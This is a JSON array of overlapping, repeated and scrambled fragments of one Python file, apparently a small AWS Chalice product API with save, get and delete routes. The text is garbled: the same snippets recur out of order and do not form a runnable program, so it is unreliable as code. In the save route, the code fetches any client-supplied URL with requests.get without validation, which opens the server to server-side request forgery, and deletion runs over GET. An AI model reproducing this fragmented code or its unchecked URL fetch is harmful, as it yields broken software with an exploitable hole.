[ "payload = app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\":", "@app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST", "# http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list =", "if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid", "None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product", "@app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\":", "{'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http", "# http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not", "\"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return", "\"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return", "= cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as", "} return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET'])", "# ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return", "saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for", "None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data)", "URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", #", "getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for debugging", "None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid", "{ \"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload: try:", "str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } # http", "( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All", "localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return", "as e: return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\",", "try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None }", "def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not", "\"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int", "return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if", "try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return", "# \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not", "\"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\":", "\"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} #", "# http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None}", "saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None } return", "chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID", "localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\",", "app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\": None }", "= Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug = False", "@app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\":", "in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\":", "debugging # app.debug = False # http localhost:8000 @app.route('/') def index(): return {'hello':", "import requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls,", "http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products #", "not found!\", \"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json()", "None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\":", "index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\"", "{ \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\",", "localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http", "return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data", "return { \"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload:", "\"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\":", "localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" #", "\"URL not found!\", \"productData\": None } if 'URL' in payload: try: product_data =", "found!\", \"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except:", "\"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data", "POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ #", "return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing", "URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ]", "\"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload:", "product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] =", "{ \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId):", "= getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return { \"message\":", "\"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if", "product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return {", "app = Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug =", "product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data", "'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST", "product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception", "{\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None", "# http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products", "deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for debugging #", "ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing", "except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products',", "URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return {", "# http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"}", "e: return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\":", "import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID )", "http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} #", "requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\":", "http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [", "= uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return {", "cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e:", "getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\",", "def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products", "if not payload: return { \"message\": \"URL not found!\", \"productData\": None } if", "\"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } #", "\"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload: try: product_data", "'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\",", "productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented", "app.debug = False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} #", "saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL not found!\",", "] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return {", "# http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products", "Exception as e: return { \"message\": str(e), \"productData\": None } return { \"message\":", "\"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\",", "\"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"])", "localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http", "# \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body", "\"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\":", "methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\": \"Missing", "cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines", "payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None", "methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product", "try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None }", "not payload: return { \"message\": \"URL not found!\", \"productData\": None } if 'URL'", "payload: return { \"message\": \"URL not found!\", \"productData\": None } if 'URL' in", "commented lines are for debugging # app.debug = False # http localhost:8000 @app.route('/')", "} if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\":", "productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data)", "\"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data):", "methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete',", "#product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e),", "def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL not", "http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", #", "from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID,", "for debugging # app.debug = False # http localhost:8000 @app.route('/') def index(): return", "\"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId)", "{ \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not", "return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if", "\"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try:", "\"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"]", "except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"}", "} #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product", "product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data }", "= False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http", "{\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return", "\"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data =", "image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST'])", "methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL", "requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData,", "failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def", "{\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try:", "{\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not", "@app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete", "Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug = False #", "{ \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data }", "[ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct():", "product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return", "return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"]", "} # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if", "return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" #", "if not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\":", "None } return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}',", "are for debugging # app.debug = False # http localhost:8000 @app.route('/') def index():", "= requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data =", "None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return {", "#product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\",", "POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" #", "from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app =", "localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list", "# image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products',", "import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') #", "uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None", "def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\": \"Missing ID!\"}", "uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are", "not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data", "return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct():", "except Exception as e: return { \"message\": str(e), \"productData\": None } return {", "= {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\":", "# \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload", "# app.debug = False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'}", "not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET'])", "found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\":", "lines are for debugging # app.debug = False # http localhost:8000 @app.route('/') def", "Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app", "return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def", "@app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\":", "= app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\": None", "getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"}", "POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\"", "\"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try:", "product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http", "product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId)", "ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return", "schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list)", "False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST", "# All commented lines are for debugging # app.debug = False # http", "uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\":", "\"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\":", "= [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def", "= uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\":", "} except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/", "{ \"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] =", "http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data:", "def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET'])", "http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except:", "\"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42", "http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\"", "not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return", "} product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except", "if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data", "localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return", "All commented lines are for debugging # app.debug = False # http localhost:8000", "return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId):", ") app = Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug", "# http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\",", "<gh_stars>1-10 import requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData,", "\"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None }", "\"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload =", "not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data =", "int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def", "\"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None}", "chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent')" ]
[ "class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill(): return", "mycroft import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message):", "from mycroft import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self,", "Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill(): return Midicontrol()", "import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol')", "MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def", "intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill():" ]
[ "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss))", "few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections", "batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred =", "type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp =", "y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:]", "< len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled from {}", "logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count)", "np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint'", "y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if", "cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length,", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss", "logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with different initialization", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0],", "acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls =", "indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices", "logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for", "logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred,", "rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on", 